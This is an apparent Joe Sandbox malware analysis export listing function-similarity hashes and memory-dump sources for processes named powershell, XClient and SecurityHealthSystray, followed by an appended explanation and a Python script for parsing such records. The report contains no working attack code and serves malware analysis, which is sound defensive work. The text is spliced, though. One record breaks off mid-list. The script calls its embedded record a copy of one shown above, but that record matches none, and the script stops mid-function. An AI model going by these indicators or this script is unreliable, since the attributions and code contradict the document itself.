                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 99294cc549ab4c3a0e60232f8e1f0a1c61150cbd3bfcaec80403c63aec67338a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D931E171A0CB4C8FDB09DF6CCC496A9BBF0EF66325F0481ABD048C7152D674A419CB92
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000014.00000002.1873059190.00007FFB4A140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A140000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_7ffb4a140000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                                                                                                                  • Instruction ID: 319a2654301e14d83db52d09acda2423b1527ae014a014e5246e42d121828ff6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D001677111CB0D4FD744EF0CE451AA5B7E0FB95364F10056DE58AC3651DA36E882CB45
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000014.00000002.1873059190.00007FFB4A140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A140000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_7ffb4a140000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 990da04f70c3b23d2ef731954551511ae3f2a52c8661f9a2e67120963b43433a
                                                                                                                                                                                                                                  • Instruction ID: e7f3dc23ad12f1ffca9f2eb46e63bc14de933f6762eceb86c5e70e59b55d6558
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 990da04f70c3b23d2ef731954551511ae3f2a52c8661f9a2e67120963b43433a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F4F0A9B650DACD4FD741EF2C98654D5BFA4EF6620174A01EBD548C7051D6125454CBC2
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000014.00000002.1874952484.00007FFB4A210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A210000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_7ffb4a210000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 4730a69714881a91a2e29dfcecc597b6a552ebe5f45706185d41d264e0036d1c
                                                                                                                                                                                                                                  • Instruction ID: 891bdc863acb575dcd018d0583c6547b67eeb07a2cc2f86d27acef2060a8aa6f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4730a69714881a91a2e29dfcecc597b6a552ebe5f45706185d41d264e0036d1c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 12F09AB2A0DA4A8FD769FE6CE4414A877E0EF8432072100BAE04DC7463CA26EC41D781
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000014.00000002.1874952484.00007FFB4A210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A210000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_7ffb4a210000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 50700454a81c329c770af13ff5eb64aeab4a799b81ff1d73385ec2123912a849
                                                                                                                                                                                                                                  • Instruction ID: 6302502bd8e26701b73eff246f8161e3380cf3eaa41614b384b754ebd544f4fd
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 50700454a81c329c770af13ff5eb64aeab4a799b81ff1d73385ec2123912a849
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 70F05EB2A0D9898FD759FF6CE4414A87BE0EF4532576500FAE14DCB463CA26AC40D750
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000014.00000002.1873059190.00007FFB4A140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A140000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_7ffb4a140000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: L_^6$L_^<$L_^F$L_^I$L_^J
                                                                                                                                                                                                                                  • API String ID: 0-1031638419
                                                                                                                                                                                                                                  • Opcode ID: 74387117d6bf6d943dc49a83f9b86094813edf986d57997cae0793b7affaf55c
                                                                                                                                                                                                                                  • Instruction ID: 057d798bee7f907878574c82febe72a538855424130af78f963261faaa5bd461
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 74387117d6bf6d943dc49a83f9b86094813edf986d57997cae0793b7affaf55c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5621F1F77084265E93027ABDBC015EC7384DFD62B6358A1B3D358CB513DA14A08B8AD4
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000014.00000002.1873059190.00007FFB4A140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A140000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_7ffb4a140000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: L_^$L_^$L_^$L_^$L_^
                                                                                                                                                                                                                                  • API String ID: 0-205492149
                                                                                                                                                                                                                                  • Opcode ID: 56630d3ed3f1009c97429718eb6ca0bfdfbf8b44a7ff335c7cda22c64974aaa5
                                                                                                                                                                                                                                  • Instruction ID: 97e0ac195b012738e4dfa1b00ce1e1f9dcca66ed6d6b5e73809160a50bedc74d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 56630d3ed3f1009c97429718eb6ca0bfdfbf8b44a7ff335c7cda22c64974aaa5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 073196E390D6D60FE3576F7D9DB50997FD9AF13218B1A41F6C9C44F083EA18284A8A01
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000014.00000002.1873059190.00007FFB4A140000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A140000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_7ffb4a140000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: L_^$L_^$L_^$L_^
                                                                                                                                                                                                                                  • API String ID: 0-2357752022
                                                                                                                                                                                                                                  • Opcode ID: e4c0a967b7899bf51469362562e91d86d0393e3cf16a55b07a83efecfd8d3332
                                                                                                                                                                                                                                  • Instruction ID: 16e524fd1a838d26bcfc8526b527536dfa5e6c31cbb358b1d2ac48f0c6c44871
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e4c0a967b7899bf51469362562e91d86d0393e3cf16a55b07a83efecfd8d3332
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3D51A5A2A0EAD20FE3171F3C897A195BFA5FF53218B1D42F6C1C54F083EB5918468B12
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000016.00000002.1800672407.00007FFB4A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A130000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ffb4a130000_XClient.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
• API String ID:
• Opcode ID: 7e529d4330e83c439931c44d02cbd98beb7bec8b69ee5d61aa32d1a458c4bae5
• Instruction ID: d86af1091425f0f372d3e931c3251f6b4702c1f0b273490d381753aa0cc1d238
• Opcode Fuzzy Hash: 7e529d4330e83c439931c44d02cbd98beb7bec8b69ee5d61aa32d1a458c4bae5
• Instruction Fuzzy Hash: BC5102A0A1E6C54FE796BF7C8869275BFD5DF97215B1800FAE08DC71A3ED18580AC342
Memory Dump Source
• Source File: 00000016.00000002.1800672407.00007FFB4A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A130000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_7ffb4a130000_XClient.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 692aed09258ccef9fa6d7103657b0ab38489f9acd09b73d4b101c13c63872cb7
• Instruction ID: d07909ee77c4e1883c277406924d4d34bd6a4f122c4a97d29188bf39b5d43b03
• Opcode Fuzzy Hash: 692aed09258ccef9fa6d7103657b0ab38489f9acd09b73d4b101c13c63872cb7
• Instruction Fuzzy Hash: CE3191A2D0E6964FEB42BF7CCCA51E97BB1EF46210B1941F7D589CB1D3DD2828058B80
Memory Dump Source
• Source File: 00000016.00000002.1800672407.00007FFB4A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A130000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_7ffb4a130000_XClient.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 557197203ae410ef6f548b262536e5d1f926d9e5b1f19d53879c5aa29461ac62
• Instruction ID: 46e484128a4ec539182d5d345b03cd2b94af64422b6e2de7a6ab52df35248989
• Opcode Fuzzy Hash: 557197203ae410ef6f548b262536e5d1f926d9e5b1f19d53879c5aa29461ac62
• Instruction Fuzzy Hash: F42191A291EA8A0FEB45AFB8CC655E97FB1FF46200F5441F6D14AD71D2CD2828058B80
Memory Dump Source
• Source File: 00000016.00000002.1800672407.00007FFB4A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A130000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_7ffb4a130000_XClient.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 616614c55d12475c2e890b4049165b25157836232334825e671d20181aacfc2b
• Instruction ID: cff66e865050da580eb3d38ee4e9791b790a428439f3c790e33430bca9e175ee
• Opcode Fuzzy Hash: 616614c55d12475c2e890b4049165b25157836232334825e671d20181aacfc2b
• Instruction Fuzzy Hash: 40511361A0EAC60FF357AF7888562757FE2EF8721071800FBD889C7193DC18AC428752
Memory Dump Source
• Source File: 00000016.00000002.1800672407.00007FFB4A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A130000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_7ffb4a130000_XClient.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: fe6791ed8f61123081fd102720a0b013675b7ef228017c87c3aaf782f1a9cb4e
• Instruction ID: 63ab37861b1d6c3b1c66626eb90c2f7e310a7cd017408cd10c64b890d1fb5bf4
• Opcode Fuzzy Hash: fe6791ed8f61123081fd102720a0b013675b7ef228017c87c3aaf782f1a9cb4e
• Instruction Fuzzy Hash: 645175B1B5960A4FEB98FF78D86D9A97FE6FF45200B9444B9E40ED7292DD389801C700
Memory Dump Source
• Source File: 00000016.00000002.1800672407.00007FFB4A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A130000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_7ffb4a130000_XClient.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5137140b66100fd5a5b8215a42dbf04ff76557be9f63b9517864c317c2d63fff
• Instruction ID: 73284334393cbd2038c60ba348c4b421282d67356c81caf02a6633cc062a382b
• Opcode Fuzzy Hash: 5137140b66100fd5a5b8215a42dbf04ff76557be9f63b9517864c317c2d63fff
• Instruction Fuzzy Hash: 4931B161B1D9490FE799BF3C985A379B6C2EF99310F1405BEE44EC32A3DD68AC418384
Memory Dump Source
• Source File: 00000016.00000002.1800672407.00007FFB4A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A130000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_7ffb4a130000_XClient.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 04cd012bda05f72e10cca411b60e851935322f341738e402f9d5123ebe0edfe7
• Instruction ID: e395644f27e15ffbc1823f92d047d5877364bc2b12c7a219adc742eb5a8d4674
• Opcode Fuzzy Hash: 04cd012bda05f72e10cca411b60e851935322f341738e402f9d5123ebe0edfe7
• Instruction Fuzzy Hash: 1E31D1A1B199064FF745BFBC98593BC77D1EF99211F1402BBE40CC3296DD2898018791
Memory Dump Source
• Source File: 00000016.00000002.1800672407.00007FFB4A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A130000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_7ffb4a130000_XClient.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: cacd2efdfc80c099680830d57b8c1602a3a590e0898498c357ef149a3c644e15
• Instruction ID: 721abfc38759e3abc968b800e46cce626ee9d9f8fe3cc7e7da893ecaf7ab2be2
• Opcode Fuzzy Hash: cacd2efdfc80c099680830d57b8c1602a3a590e0898498c357ef149a3c644e15
• Instruction Fuzzy Hash: A031A4B0A19A0A8FEB45FF78C8656ED77E2FF99300FA444B5D409D7282CE38A841C740
Memory Dump Source
• Source File: 00000016.00000002.1800672407.00007FFB4A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A130000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_7ffb4a130000_XClient.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1f16feadf6b7b5e1a631bb0f67158ede8cf1b86a3bdcc899720b85cdf77ecdc1
• Instruction ID: 271ab5ec16a5df380cf177f378b5759945215f364212c8577ae9594801e4e32b
• Opcode Fuzzy Hash: 1f16feadf6b7b5e1a631bb0f67158ede8cf1b86a3bdcc899720b85cdf77ecdc1
• Instruction Fuzzy Hash: 5531E5A1A4964A4FE741FF6CD8A99A87FA2FF85300BE484B6D409C778ACD24A940C741
Memory Dump Source
• Source File: 00000016.00000002.1800672407.00007FFB4A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A130000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_7ffb4a130000_XClient.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 24b213bd2fff2668a15d319d1cb1378b9abb2f74461c3df1a900a048c425009d
• Instruction ID: f207bdca558e46098b4e968bf2098e7363cf48c9c120d23d9813ceb1e587c018
• Opcode Fuzzy Hash: 24b213bd2fff2668a15d319d1cb1378b9abb2f74461c3df1a900a048c425009d
• Instruction Fuzzy Hash: B301F59190C6810FF792BF389C558717FE4DFA2250B1804FBE889CA193DC086945C752
Memory Dump Source
• Source File: 00000033.00000002.1870133656.00007FFB4A1F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A1F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_51_2_7ffb4a1f0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c81b8ed70c1243fbb86606fa77de4c0416223545e80cbc147456a2977408695e
• Instruction ID: db14b6e98e531c32847512b2d6919b1f0c449b57d02b2ed7cf728148e4ab792b
• Opcode Fuzzy Hash: c81b8ed70c1243fbb86606fa77de4c0416223545e80cbc147456a2977408695e
• Instruction Fuzzy Hash: 012236A2A0EBC94FE396AE7899551B57FE1EF47210B1801FFE08DC7193D9189C06C792
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000033.00000002.1868732091.00007FFB4A120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A120000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_51_2_7ffb4a120000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 8f4622682460f4f4182d85946c92f7429dd419692cb54a846880aff267704dde
                                                                                                                                                                                                                                  • Instruction ID: d47c13831adde0affa775907a58d9202ce085985943630998dddaa1f76f50118
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8f4622682460f4f4182d85946c92f7429dd419692cb54a846880aff267704dde
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5861C671E0DA598FE745EF6CD8556ACBBF1EF4A310F1441AED049D7292CA259802CB81
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000033.00000002.1868732091.00007FFB4A120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A120000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_51_2_7ffb4a120000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                                                  • Instruction ID: befb5f09fb28491efca7ac731e606f1cd681f8a65fc3f8e08776dee73fb1b2c3
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F201677115CB0D4FDB44EF0CE451AA5B7E0FB95364F10056DE58AC3691D636E881CB46
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000033.00000002.1868732091.00007FFB4A120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A120000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_51_2_7ffb4a120000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: (f:J$8f:J$Hf:J$Xf:J
                                                                                                                                                                                                                                  • API String ID: 0-1643799202
                                                                                                                                                                                                                                  • Opcode ID: edc11e33b5263ea65393482c3c902e78df0603d9a59f98b86ab38265839d4924
                                                                                                                                                                                                                                  • Instruction ID: 52233e2d97a085f33cf40cb96a89e58ad009515e4fa506688242cfc927006295
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: edc11e33b5263ea65393482c3c902e78df0603d9a59f98b86ab38265839d4924
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F1F054CBA1EAD60BE3950EAC7D9E2A94B52FB4913171A01FBE0CD9209B685DDC0647C1
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000036.00000002.1686751352.0000000000BE1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1686510941.0000000000BE0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1700904810.00000000010B5000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1705241012.0000000001523000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1705307488.000000000152B000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1705453671.000000000152C000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1705586594.0000000001530000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1705649238.0000000001535000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1706029179.0000000001539000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1706244411.0000000001549000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1706330490.000000000154C000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1706449757.0000000001566000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1706571351.0000000001567000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1706716436.0000000001569000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1706924783.000000000157A000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1707091359.000000000157E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1707170702.000000000157F000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1707554882.0000000001595000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1707554882.000000000159B000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1707554882.00000000015B2000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1707554882.00000000015B9000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1707554882.00000000015E0000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1708228530.00000000015EB000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1708616446.0000000001608000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1709355693.0000000001609000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_54_2_be0000_SecurityHealthSystray.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: f534232bf1c6ba2bd4c45eff9a9e7b72a6ee4da9b2d280db604ca2125ba236fe
                                                                                                                                                                                                                                  • Instruction ID: d9ef84e58ec4ec15d92926271f64084644b693e1f87133baf5b26b0a30f43d4c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f534232bf1c6ba2bd4c45eff9a9e7b72a6ee4da9b2d280db604ca2125ba236fe
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E431792791CFC482D3218B24B5413AAB364F7A9794F15A715EFC812A1ADB38E2E5DB40
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000036.00000002.1686751352.0000000000BE1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00BE0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1686510941.0000000000BE0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1700904810.00000000010B5000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1705241012.0000000001523000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1705307488.000000000152B000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1705453671.000000000152C000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1705586594.0000000001530000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1705649238.0000000001535000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1706029179.0000000001539000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1706244411.0000000001549000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1706330490.000000000154C000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1706449757.0000000001566000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1706571351.0000000001567000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1706716436.0000000001569000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1706924783.000000000157A000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1707091359.000000000157E000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1707170702.000000000157F000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1707554882.0000000001595000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1707554882.000000000159B000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000036.00000002.1707554882.00000000015B2000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: a37bc91bcb8a8a00894d53e2d2ab658471873bbbd274150a73be02d3b4571e14
                                                                                                                                                                                                                                  • Instruction ID: f05a983c64673d12cf99d4c0033a19f9aad8a9fce3a71e61fc128ff35009c5b1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a37bc91bcb8a8a00894d53e2d2ab658471873bbbd274150a73be02d3b4571e14
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9501455280C6C10FE752BF3888658757FE8CF92251B1809FAE8C8DA1A3CC09A841C753
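When these function-similarity records are lifted out of a text export of the report, the first thing worth doing is a consistency check between the Memory Dump Source line and the IDA Plugin snapshot name, so that a hash is never attributed to the wrong dump. The script below is an added example and is not part of the Joe Sandbox report or of Joe Security's tooling. It embeds the record above as constructed input. The field layout it assumes for the .sdmp name (first field = PID in hex, second = dump index, fourth = base address) and for the .jbxd name (hcaresult_<pid>_<dump>_<base>_<image>) is inferred from this page only: 0x5B is 91, dump 2 matches "_2_", and the fourth field equals the printed Offset. Treat that layout as an assumption, not documented behaviour.

```python
import re

# Constructed input: the second record shown above, copied as plain text.
RECORD = """\
Memory Dump Source
• Source File: 0000005B.00000002.1769488072.00007FFB4A120000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A120000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_91_2_7ffb4a120000_XClient.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a37bc91bcb8a8a00894d53e2d2ab658471873bbbd274150a73be02d3b4571e14
• Instruction ID: f05a983c64673d12cf99d4c0033a19f9aad8a9fce3a71e61fc128ff35009c5b1
• Opcode Fuzzy Hash: a37bc91bcb8a8a00894d53e2d2ab658471873bbbd274150a73be02d3b4571e14
• Instruction Fuzzy Hash: 9501455280C6C10FE752BF3888658757FE8CF92251B1809FAE8C8DA1A3CC09A841C753
"""

FIELD_RE = re.compile(r"^•\s*([^:]+):\s*(.*)$")
SOURCE_RE = re.compile(
    r"^(?P<name>\S+\.sdmp),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),\s*based on PE:\s*(?P<pe>\w+)$"
)
SNAPSHOT_RE = re.compile(r"^hcaresult_(\d+)_(\d+)_([0-9a-fA-F]+)_(.+)\.jbxd$")


def parse_record(text):
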